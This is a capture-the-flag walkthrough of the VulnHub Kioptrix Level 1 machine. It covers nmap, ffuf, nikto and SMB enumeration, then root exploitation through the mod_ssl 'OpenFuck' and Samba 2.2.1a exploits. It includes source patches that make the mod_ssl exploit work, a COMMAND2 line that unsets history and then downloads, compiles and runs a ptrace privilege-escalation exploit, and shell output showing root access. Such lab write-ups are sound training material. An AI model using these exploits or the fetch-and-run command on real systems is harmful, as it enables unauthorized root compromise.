Recon

NMAP Complete Scan

┌──(root💀kali)-[~/vulnHub/Bob1.0.1/192.168.236.5]
└─# cat ~/vulnHub/kioptrix1/192.168.1.104/scans/_full_tcp_nmap.txt 
# Nmap 7.92 scan initiated Sun Jan 23 14:24:09 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/kioptrix1/192.168.1.104/scans/_full_tcp_nmap.txt -oX /root/vulnHub/kioptrix1/192.168.1.104/scans/xml/_full_tcp_nmap.xml 192.168.1.104
Nmap scan report for 192.168.1.104
Host is up, received arp-response (0.00043s latency).
Scanned at 2022-01-23 14:24:10 +08 for 31s
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 64 OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 35 109482092953601530927446985143812377560925655194254170270380314520841776849335628258408994190413716152105684423280369467219093526740118507720167655934779634416983599247086840099503203800281526143567271862466057363705861760702664279290804439502645034586412570490614431533437479630834594344497670338190191879537
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAKtycvxuV/e7s2cN74HyTZXHXiBrwyiZe/PKT/inuT5NDSQTPsGiyJZU4gefPAsYKSw5wLe28TDlZWHAdXpNdwyn4QrFQBjwFR+8WbFiAZBoWlSfQPR2RQW8i32Y2P2V79p4mu742HtWBz0hTjkd9qL5j8KCUPDfY9hzDuViWy7PAAAAFQCY9bvq+5rs1OpY5/DGsGx0k6CqGwAAAIBVpBtIHbhvoQdN0WPe8d6OzTTFvdNRa8pWKzV1Hpw+e3qsC4LYHAy1NoeaqK8uJP9203MEkxrd2OoBJKn/8EXlKAco7vC1dr/QWae+NEkI1a38x0Ml545vHAGFaVUWkffHekjhR476Uq4N4qeLfFp5B+v+9flLxYVYsY/ymJKpNgAAAIEApyjrqjgX0AE4fSBFntGFWM3j5M3lc5jw/0qufXlHJu8sZG0FRf9wTI6HlJHHsIKHA7FZ33vGLq3TRmvZucJZ0l55fV2ASS9uvQRE+c8P6w72YCzgJN7v4hYXxnY4RiWvINjW/F6ApQEUJc742i6Fn54FEYAIy5goatGFMwpVq3Q=
|   1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvv8UUWsrO7+VCG/rTWY72jElft4WXfXGWybh141E8XnWxMCu+R1qdocxhh+4Clz8wO9beuZzG1rjlAD+XHiR3j2P+sw6UODeyBkuP24a+7V8P5nu9ksKD1fA83RyelgSgRJNQgPfFU3gngNno1yN6ossqkcMQTI1CY5nF6iYePs=
80/tcp   open  http        syn-ack ttl 64 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     syn-ack ttl 64 2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   syn-ack ttl 64 Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2022-01-23T07:26:30+00:00; +1h01m49s from scanner time.
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/localityName=SomeCity/emailAddress=root@localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/localityName=SomeCity/emailAddress=root@localhost.localdomain
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after:  2010-09-26T09:32:06
| MD5:   78ce 5293 4723 e7fe c28d 74ab 42d7 02f1
| SHA-1: 9c42 91c3 bed2 a95b 983d 10ac f766 ecb9 8766 1d33
| -----BEGIN CERTIFICATE-----
| MIIEDDCCA3WgAwIBAgIBADANBgkqhkiG9w0BAQQFADCBuzELMAkGA1UEBhMCLS0x
| EjAQBgNVBAgTCVNvbWVTdGF0ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoT
| EFNvbWVPcmdhbml6YXRpb24xHzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVu
| aXQxHjAcBgNVBAMTFWxvY2FsaG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJ
| ARYacm9vdEBsb2NhbGhvc3QubG9jYWxkb21haW4wHhcNMDkwOTI2MDkzMjA2WhcN
| MTAwOTI2MDkzMjA2WjCBuzELMAkGA1UEBhMCLS0xEjAQBgNVBAgTCVNvbWVTdGF0
| ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoTEFNvbWVPcmdhbml6YXRpb24x
| HzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVuaXQxHjAcBgNVBAMTFWxvY2Fs
| aG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJARYacm9vdEBsb2NhbGhvc3Qu
| bG9jYWxkb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM4BXiK5bWlS
| ob4B6a9ALmKDbSxqoMcM3pvGHscFsJs+fHHn+CjU1DX44LPDNOwwOl6Uqb+GtZJv
| 6juVetDwcTbbocC2BM+6x6gyV/H6aYuCssCwrOuVKWp7l9xVpadjITUmhh+uB81q
| yqopt//Z4THww7SezLJQXi1+Grmp3iFDAgMBAAGjggEcMIIBGDAdBgNVHQ4EFgQU
| 7OdRS0NrbNB8gE9qUjcw8LF8xKAwgegGA1UdIwSB4DCB3YAU7OdRS0NrbNB8gE9q
| Ujcw8LF8xKChgcGkgb4wgbsxCzAJBgNVBAYTAi0tMRIwEAYDVQQIEwlTb21lU3Rh
| dGUxETAPBgNVBAcTCFNvbWVDaXR5MRkwFwYDVQQKExBTb21lT3JnYW5pemF0aW9u
| MR8wHQYDVQQLExZTb21lT3JnYW5pemF0aW9uYWxVbml0MR4wHAYDVQQDExVsb2Nh
| bGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0BCQEWGnJvb3RAbG9jYWxob3N0
| LmxvY2FsZG9tYWluggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEA
| Vgrmpprfkmd8vy0E0UmZvWdIcDrIYRvUWcwSFwc6bGqJeJr0CYSB+jDQzA6Cu7nt
| xjrlXxEjHFBBbF4iEMJDnuQTFGvICQIcrqJoH3lqAO73u4TeBDjhv5n+h+S37CHd
| 1lvgRgoOay9dWaLKOyUThgKF2HcPWMZIj2froo5eihM=
|_-----END CERTIFICATE-----
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: 400 Bad Request
1024/tcp open  status      syn-ack ttl 64 1 (RPC #100024)
MAC Address: 00:0C:29:6C:89:B3 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/23%OT=22%CT=1%CU=40617%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=61ECF4A9%P=x86_64-pc-linux-gnu)SEQ(SP=C8%GCD=2%ISR=CF%TI=Z%CI=Z%II=I%T
OS:S=7)OPS(O1=M5B4ST11NW0%O2=M5B4ST11NW0%O3=M5B4NNT11NW0%O4=M5B4ST11NW0%O5=
OS:M5B4ST11NW0%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1
OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11
OS:NW0%RD=0%Q=)T4(R=Y%DF=Y%T=FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=FF
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=FF%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=FF%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=FF%CD=S)

Uptime guess: 0.005 days (since Sun Jan 23 14:17:54 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: 1h01m48s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59044/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 26596/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 36794/udp): CLEAN (Timeout)
|   Check 4 (port 37017/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-time: Protocol negotiation failed (SMB2)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   MYGROUP<00>          Flags: <group><active>
|   MYGROUP<1d>          Flags: <unique><active>
|   MYGROUP<1e>          Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.1.104

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 23 14:24:41 2022 -- 1 IP address (1 host up) scanned in 31.73 seconds

TCP/80 (HTTP)

FFUF/FEROX

┌──(root💀kali)-[~/vulnHub/kioptrix1]
└─# ffuf -u http://192.168.1.104/FUZZ -w /usr/share/wordlists/dirb/common.txt -e ".html,.txt,.php" -fw 20

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.1.104/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 20
________________________________________________

                        [Status: 200, Size: 2890, Words: 453, Lines: 87]
index.html              [Status: 200, Size: 2890, Words: 453, Lines: 87]
index.html              [Status: 200, Size: 2890, Words: 453, Lines: 87]
manual                  [Status: 301, Size: 294, Words: 19, Lines: 10]
mrtg                    [Status: 301, Size: 292, Words: 19, Lines: 10]
test.php                [Status: 200, Size: 27, Words: 2, Lines: 6]
usage                   [Status: 301, Size: 293, Words: 19, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 6129 req/sec :: Duration: [0:00:06] :: Errors: 0 ::

test.php

Nikto

┌──(root💀kali)-[~/vulnHub/kioptrix1]
└─# nikto -ask=no -h http://192.168.1.104:80 2>&1 | tee "/root/vulnHub/kioptrix1/192.168.1.104/scans/tcp80/tcp_80_http_nikto.txt"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.104
+ Target Hostname:    192.168.1.104
+ Target Port:        80
+ Start Time:         2022-01-23 15:08:22 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 11:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2022-01-23 15:08:47 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell
wordpress is a false positive

TCP/443 (HTTPS)

FFUF

The same as TCP/80

Nikto

The same as TCP/80

TCP/139,445 (SMB)

Enum4linux

 ------------------------------------------
  OS Information via RPC for 192.168.1.104   
 ------------------------------------------
[*] Enumerating via unauthenticated SMB session on 139/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
	OS: Linux/Unix (Samba 2.2.1a)
	OS version: '4.5'
	OS release: not supported
	OS build: not supported
	Native OS: Unix
	Native LAN manager: Samba 2.2.1a
	Platform id: '500'
	Server type: '0x9a03'
	Server type string: Wk Sv PrQ Unx NT SNT Samba Server

Samba 2.2.1a

SMBMap + Crackmapexec

┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104]
└─# crackmapexec smb $ip -u '' -p '' --shares

┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104]
└─# smbmap -H $ip
[!] 445 not open on 192.168.1.104...

Initial Foothold

TCP/80 (HTTP) - No Exploits Found

View enumerated directories
- test.php
  - php code does not work
- manual, mrtg, usage
  - Redirected to localhost

TCP/443 (HTTPS) - No Exploits Found

View enumerated directories
- test.php
  - php code does not work
- manual, mrtg, usage
  - Redirected to localhost

Search for mod_ssl 2.8.7 exploits

 ┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104/exploit/mod_ssl]
 └─# searchsploit mod_ssl 2.8
 Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow               unix/remote/21671.c
 Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow               unix/remote/21671.c
 Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)         unix/remote/764.c
	
 ┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104/exploit/mod_ssl]
 └─# gcc 764.c -o exploit
 764.c:644:31: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function); did you mean ‘SSL_MAX_SSL_SESSION_ID_LENGTH’?

However, none of them work w/o any modification

Fixing the exploit

Guide I followed

Line 24: Add

 #include <openssl/rc4.h>
 #include <openssl/md5.h>

 #define SSL2_MT_ERROR 0
 #define SSL2_MT_CLIENT_FINISHED 3
 #define SSL2_MT_SERVER_HELLO 4
 #define SSL2_MT_SERVER_VERIFY 5
 #define SSL2_MT_SERVER_FINISHED 6
 #define SSL2_MAX_CONNECTION_ID_LENGTH 16

Line 673: Replace COMMAND 2

 #define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"

Line 970: Add
1 const unsigned char *p, *end;
Line 972: Remove
1 unsigned char *p, *end;

Line 1079: Replace

 if (EVP_PKEY_get1_RSA(pkey) == NULL) {

Line 1085: Replace

 encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);

Install
1 apt-get install libssl-dev
Compile
1 gcc -o 764 764.c -lcrypto

Run the exploit

NMAP Scan

  80/tcp   open  http        syn-ack ttl 64 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
  |_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
  | http-methods: 
  |   Supported Methods: GET HEAD OPTIONS TRACE
  |_  Potentially risky methods: TRACE

Red-Hat/Linux
Apache/1.3.20

Exploit

  ┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104/exploit/mod_ssl]
  └─# gcc -o 764 764.c -lcrypto

  ┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104/exploit/mod_ssl]
  └─# ./764 | grep "RedHat" | grep "1.3.20"
      0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
      0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

  ┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104/exploit/mod_ssl]
  └─# ./764 0x6b $ip 443 -c 50
  Connection... 50 of 50
  Establishing SSL connection
  cipher: 0x4043808c   ciphers: 0x80f8258
  Ready to send shellcode
  Spawning shell...
  bash: no job control in this shell
  bash-2.05$ 
  ace-kmod.c; rm ptrace-kmod.c; ./p;  wget 192.168.1.1/ptrace-kmod.c; gcc -o p ptr 
  --04:45:09--  http://192.168.1.1/ptrace-kmod.c
             => `ptrace-kmod.c'
  Connecting to 192.168.1.1:80... connected!
  HTTP request sent, awaiting response... 200 OK
  Length: 3,921 [text/x-csrc]

      0K ...                                                   100% @   3.74 MB/s

  04:45:09 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

  [+] Attached to 19340
  [+] Waiting for signal
  [+] Signal caught
  [+] Shellcode placed at 0x4001189d
  [+] Now wait for suid shell...
  whoami
  root

TCP/139,445 (SMB) - Samba 2.2.1a Exploit

Search for Samba 2.2.1a exploits

 ┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104/exploit]
 └─# searchsploit samba 2.2
 ----------------------------------------------------------------------------------- 
 Exploit Title                    			   	  |  Path								
 ----------------------------------------------------------------------------------- 
 Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
 -----------------------------------------------------------------------------------

Compile Exploit & Run

 ┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104/exploit/samba]
 └─# searchsploit -m multiple/remote/10.c
   Exploit: Samba < 2.2.8 (Linux/BSD) - Remote Code Execution
       URL: https://www.exploit-db.com/exploits/10
      Path: /usr/share/exploitdb/exploits/multiple/remote/10.c
 File Type: C source, ASCII text

 Copied to: /root/vulnHub/kioptrix1/192.168.1.104/exploit/samba/10.c


 ┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104/exploit/samba]
 └─# gcc 10.c -o exploit
 ┌──(root💀kali)-[~/vulnHub/kioptrix1/192.168.1.104/exploit/samba]
 └─# ./exploit -b 0 -c 192.168.1.1 $ip
 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
 --------------------------------------------------------------
 + Bruteforce mode. (Linux)
 + Host is running samba.
 + Worked!
 --------------------------------------------------------------
 *** JE MOET JE MUIL HOUWE
 Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
 uid=0(root) gid=0(root) groups=99(nobody)
 whoami

Privilege Escalation

Root - Via

Already root by running the service exploits

Vulnhub - Kioptrix L1

Recon

NMAP Complete Scan

TCP/80 (HTTP)

FFUF/FEROX

Nikto

TCP/443 (HTTPS)

FFUF

Nikto

TCP/139,445 (SMB)

Enum4linux

SMBMap + Crackmapexec

Initial Foothold

TCP/80 (HTTP) - No Exploits Found

TCP/443 (HTTPS) - No Exploits Found

TCP/139,445 (SMB) - Samba 2.2.1a Exploit

Privilege Escalation

Root - Via

Further Reading

Vulnhub - Tommy Boy 1

Vulnhub - Tiki 1

Vulnhub - Breach 1